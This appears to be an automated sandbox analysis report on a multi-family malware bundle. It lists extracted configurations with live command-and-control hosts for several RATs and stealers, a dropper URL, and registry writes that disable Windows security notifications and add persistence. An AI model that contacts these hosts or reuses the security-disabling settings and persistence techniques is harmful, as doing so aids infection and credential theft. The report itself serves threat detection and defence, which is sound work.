asyncrat | e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1

max time kernel
736s
max time network
1134s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
16-11-2024 18:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe.zip
Size

4KB
MD5

16d34133af438a73419a49de605576d9
SHA1

c3dbcd70359fdad8835091c714a7a275c59bd732
SHA256

e4ec3a45621dd556deeea5f953fa05909c82630e9f17baf6b14272a0360d62d1
SHA512

59c0272d6faa2682b7a6ce1cd414d53cc39f06035f4f38a2e206965805034bf8012b02d59f428973965136d70c89f87ac3b17b5db9c1b1d49844be182b47a3d7
SSDEEP

96:xBf1inGx9SfZ+VCv3wlTDMQ1kyKXyyJNOBIKkNvL5qK+7zHf6MlYOQVPGmcEy:xBfwncSf8Cv3w9DZjKXjmBIKEvLs97D5

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://37.1.196.35/un2/botui.dat

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

Mutex

HyFTucy74RnH

Attributes

delay
3
install
true
install_file
Discord.exe
install_folder
%AppData%

aes.plain

Extracted

Family

lumma

https://delaylacedmn.site

https://writekdmsnu.site

https://agentyanlark.site

https://bellykmrebk.site

https://underlinemdsj.site

https://commandejorsk.site

https://possiwreeste.site

https://famikyjdiag.site

Extracted

Family

cryptbot

fivexc5sr.top

analforeverlovyu.top

Attributes

url_path
/v1/upload.php

Extracted

Family

vidar

Version

11.4

Botnet

7c37934964656ffad71319cfd3f70c69

https://t.me/asg7rd

https://steamcommunity.com/profiles/76561199794498376

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6

Extracted

Family

metasploit

Version

windows/reverse_tcp

129.151.210.233:4444

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

100 RND

91.92.243.191:5401

Mutex

6871a79e-e4f7-4fb3-ae38-dc20c1d657a0

Attributes

delay
1
install
true
install_file
hyperhostvc.exe
install_folder
%AppData%

aes.plain

Extracted

Family

xworm

Version

5.0

nomorelife1.ddns.net:999

154.197.69.165:7000

104.219.239.11:6969

188.190.10.161:4444

Mutex

RQyA6qFjTisp9KB8

Attributes

Install_directory
%AppData%
install_file
System.exe

aes.plain

Extracted

Family

redline

38.180.203.208:14238

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

89.105.223.196:29862

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

62.113.117.95:4449

Mutex

hwelcvbupaqfzors

Attributes

delay
10
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

njrat

Version

Njrat 0.7 Golden By Hassan Amiri

Botnet

HacKed

82.193.104.21:5137

Mutex

Windows Update

Attributes

reg_key
Windows Update
splitter
|Hassan|

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

3.70.228.168:555

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
trojan backdoor cobaltstrike
Cobaltstrike family
cobaltstrike

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral4/memory/5236-5688-0x00000237EE3D0000-0x00000237EE3DE000-memory.dmp	disable_win_def

CryptBot
CryptBot is a C++ stealer distributed widely in bundle with other software.
spyware stealer cryptbot
Cryptbot family
cryptbot

Detect Vidar Stealer 5 IoCs

stealer

resource	yara_rule
behavioral4/memory/4636-756-0x0000000000400000-0x0000000000700000-memory.dmp	family_vidar_v7
behavioral4/memory/4636-759-0x0000000000400000-0x0000000000700000-memory.dmp	family_vidar_v7
behavioral4/memory/4636-757-0x0000000000400000-0x0000000000700000-memory.dmp	family_vidar_v7
behavioral4/memory/4636-776-0x0000000000400000-0x0000000000700000-memory.dmp	family_vidar_v7
behavioral4/memory/4636-777-0x0000000000400000-0x0000000000700000-memory.dmp	family_vidar_v7

Detect Xworm Payload 8 IoCs

resource	yara_rule
behavioral4/files/0x000200000002a793-1109.dat	family_xworm
behavioral4/memory/5860-1116-0x00000000002C0000-0x00000000002D0000-memory.dmp	family_xworm
behavioral4/files/0x000200000002a7d9-2763.dat	family_xworm
behavioral4/memory/1684-2771-0x00000000003F0000-0x0000000000400000-memory.dmp	family_xworm
behavioral4/memory/5236-2834-0x00000237EE040000-0x00000237EE06C000-memory.dmp	family_xworm
behavioral4/files/0x002100000002aa6e-3008.dat	family_xworm
behavioral4/memory/3680-3014-0x00000000001C0000-0x00000000001E8000-memory.dmp	family_xworm
behavioral4/memory/8064-4383-0x0000000000400000-0x000000000042E000-memory.dmp	family_xworm

Detects ZharkBot payload 1 IoCs

ZharkBot is a botnet written C++.

resource	yara_rule
behavioral4/files/0x000200000002a737-704.dat	zharkcore

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Meduza
Meduza is a crypto wallet and info stealer written in C++.
stealer meduza

Meduza Stealer payload 1 IoCs

resource	yara_rule
behavioral4/files/0x001900000002acbd-9279.dat	family_meduza

Meduza family
meduza
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysarddrvs.exe

Njrat family
njrat
Phorphiex family
phorphiex

Phorphiex payload 5 IoCs

resource	yara_rule
behavioral4/files/0x000700000000f46a-946.dat	family_phorphiex
behavioral4/files/0x000500000000f4d4-955.dat	family_phorphiex
behavioral4/files/0x0002000000025f92-1055.dat	family_phorphiex
behavioral4/files/0x000300000002a7fb-2836.dat	family_phorphiex
behavioral4/files/0x000e00000002ba2d-25650.dat	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8156	4480	cmd.exe	91

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral4/files/0x001900000002ade0-10690.dat	family_quasar
behavioral4/files/0x001500000002b3bc-23727.dat	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral4/files/0x000500000000f53b-967.dat	family_redline
behavioral4/memory/4844-972-0x00000000007F0000-0x000000000082E000-memory.dmp	family_redline
behavioral4/files/0x000200000002a82b-2916.dat	family_redline
behavioral4/memory/6824-2921-0x0000000000680000-0x00000000006D2000-memory.dmp	family_redline
behavioral4/memory/4568-2959-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
behavioral4/files/0x001b00000002acae-6911.dat	family_redline

Redline family
redline
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral4/memory/5236-5687-0x00000237EF400000-0x00000237EF520000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Windows security bypass 2 TTPs 12 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysarddrvs.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
ZharkBot
ZharkBot is a botnet written C++.
botnet zharkbot
Zharkbot family
zharkbot
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 4 IoCs

rat

resource	yara_rule
behavioral4/files/0x0002000000025cca-36.dat	family_asyncrat
behavioral4/files/0x000200000002a783-1061.dat	family_asyncrat
behavioral4/files/0x001e00000002ac9b-5971.dat	family_asyncrat
behavioral4/files/0x000300000002a822-6841.dat	family_asyncrat

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral4/files/0x001900000002abf7-841.dat	mimikatz

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2920	powershell.exe
3336	powershell.exe
5300	powershell.exe
7088	powershell.exe
5512	powershell.exe
6764	powershell.exe
3532	powershell.exe
6652	powershell.exe
6848	powershell.exe
7252	powershell.exe
8576	powershell.exe
3532	powershell.exe
7668	powershell.exe
4792	powershell.exe
9444	powershell.exe
3704	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1648	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral4/files/0x001c00000002acfc-10479.dat	aspack_v212_v242

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2VNsuobkG8VRVkz6wWcGv43k.bat	file1.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk	Fast%20Download.exe

Executes dropped EXE 33 IoCs

pid	Process
3352	4363463463464363463463463.exe
2908	Discord2.exe
3660	87f3f2.exe
240	Discord.exe
1572	4363463463464363463463463.exe
800	CompleteStudio.exe
4204	Vidar.exe
1164	NJRat.exe
4548	Authenticator222.exe
4984	winbox.exe
2408	file1.exe
1176	5_6190317556063017550.exe
3436	ZharkBOT.exe
2588	mimikatz.exe
3692	Fast%20Download.exe
3016	Newofff.exe
4460	Hkbsse.exe
4464	yxrd0ob7.exe
2208	yxrd0ob7.exe
5092	twztl.exe
3440	11.exe
1800	sysppvrdnvs.exe
4844	frap.exe
4884	sysarddrvs.exe
276	build2.exe
1128	install2.exe
4152	test.exe
436	test.exe
3400	test.exe
1332	test.exe
3088	test.exe
2564	test.exe
2264	2.exe

Loads dropped DLL 64 IoCs

pid	Process
3660	87f3f2.exe
4636	Applaunch.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
4152	test.exe
436	test.exe
3400	test.exe
436	test.exe
3400	test.exe
436	test.exe
436	test.exe
436	test.exe
436	test.exe
436	test.exe
1332	test.exe
1332	test.exe
436	test.exe
436	test.exe
436	test.exe
436	test.exe
436	test.exe
436	test.exe
436	test.exe
436	test.exe
436	test.exe
436	test.exe
436	test.exe
436	test.exe
3088	test.exe
3088	test.exe
3088	test.exe
3088	test.exe
3088	test.exe
3088	test.exe
3088	test.exe
3088	test.exe
2564	test.exe
2564	test.exe
3400	test.exe
3400	test.exe
3400	test.exe
3400	test.exe
3400	test.exe
3400	test.exe
1332	test.exe
1332	test.exe
1332	test.exe
1332	test.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral4/memory/5660-1099-0x00007FF65FD00000-0x00007FF65FF3C000-memory.dmp	vmprotect
behavioral4/memory/5660-1102-0x00007FF65FD00000-0x00007FF65FF3C000-memory.dmp	vmprotect

Windows security modification 2 TTPs 14 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysppvrdnvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysarddrvs.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe"	twztl.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysarddrvs.exe"	11.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Desktop\\Files\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Desktop\\Files\\NJRat.exe\" .."	NJRat.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs

Web Service

T1102

flow	ioc
784	pastebin.com
908	raw.githubusercontent.com
909	raw.githubusercontent.com
20	raw.githubusercontent.com
47	raw.githubusercontent.com
71	pastebin.com
79	iplogger.com
262	raw.githubusercontent.com
1201	raw.githubusercontent.com
18	raw.githubusercontent.com
69	pastebin.com
132	raw.githubusercontent.com
780	pastebin.com
80	iplogger.com

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1179	api.ipify.org
1371	checkip.dyndns.org
198	ipinfo.io
199	ipinfo.io
307	ip-api.com
710	api.ipify.org
711	api.ipify.org
1023	ip-api.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2428	GameBarPresenceWriter.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral4/files/0x000200000002a7a0-1387.dat	autoit_exe
behavioral4/files/0x000700000002a48d-2322.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

discovery

Process Discovery

T1057

pid	Process
5036	tasklist.exe
6496	tasklist.exe
3668	tasklist.exe
9128	tasklist.exe
6912	tasklist.exe
3812	tasklist.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3660 set thread context of 4632	3660	87f3f2.exe	100
PID 800 set thread context of 4192	800	CompleteStudio.exe	129
PID 4204 set thread context of 4636	4204	Vidar.exe	142
PID 4464 set thread context of 2208	4464	yxrd0ob7.exe	159

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/0x000400000002a70a-655.dat	upx
behavioral4/memory/4984-657-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral4/memory/4984-732-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral4/memory/4984-982-0x0000000000400000-0x0000000000422000-memory.dmp	upx

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File opened for modification	C:\Windows\sysppvrdnvs.exe	twztl.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File created	C:\Windows\Tasks\Hkbsse.job	Newofff.exe
File created	C:\Windows\sysppvrdnvs.exe	twztl.exe
File created	C:\Windows\sysarddrvs.exe	11.exe
File opened for modification	C:\Windows\sysarddrvs.exe	11.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe

Launches sc.exe 20 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2424	sc.exe
416	sc.exe
5632	sc.exe
5164	sc.exe
2132	sc.exe
4532	sc.exe
5608	sc.exe
5024	sc.exe
1104	sc.exe
4648	sc.exe
5652	sc.exe
5820	sc.exe
6740	sc.exe
3400	sc.exe
3520	sc.exe
3088	sc.exe
5556	sc.exe
4628	sc.exe
6472	sc.exe
4608	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 5 IoCs

pid	pid_target	Process	procid_target
3156	3436	WerFault.exe	137
276	4464	WerFault.exe	157
1300	10032	WerFault.exe	465
9556	8	WerFault.exe	592
5352	9536	WerFault.exe	795

System Location Discovery: System Language Discovery 1 TTPs 49 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winbox.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5_6190317556063017550.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysarddrvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZharkBOT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysppvrdnvs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Applaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Newofff.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	87f3f2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yxrd0ob7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	twztl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NJRat.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Fast%20Download.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	yxrd0ob7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	frap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
7676	cmd.exe
8856	netsh.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Applaunch.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Applaunch.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	5_6190317556063017550.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	5_6190317556063017550.exe

Delays execution with timeout.exe 6 IoCs

evasion

pid	Process
3452	timeout.exe
1852	timeout.exe
5152	timeout.exe
1868	timeout.exe
9816	timeout.exe
9528	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5548	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 12 IoCs

evasion

pid	Process
5344	taskkill.exe
2432	taskkill.exe
4732	taskkill.exe
5800	taskkill.exe
5248	taskkill.exe
5232	taskkill.exe
5240	taskkill.exe
5256	taskkill.exe
5740	taskkill.exe
5728	taskkill.exe
5556	taskkill.exe
5644	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
